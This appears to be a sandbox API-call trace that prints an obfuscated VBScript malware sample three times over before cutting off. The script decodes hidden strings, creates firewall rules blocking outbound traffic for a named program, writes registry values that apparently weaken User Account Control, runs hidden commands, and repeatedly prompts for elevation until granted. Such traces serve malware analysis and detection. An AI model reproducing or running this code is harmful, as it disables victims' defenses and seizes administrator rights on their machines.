CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 48 [0222.947] wcsncmp (_String1=" sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.947] wcsncmp (_String1="sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0222.948] wcsncmp (_String1="r + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0222.948] wcsncmp (_String1=" + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 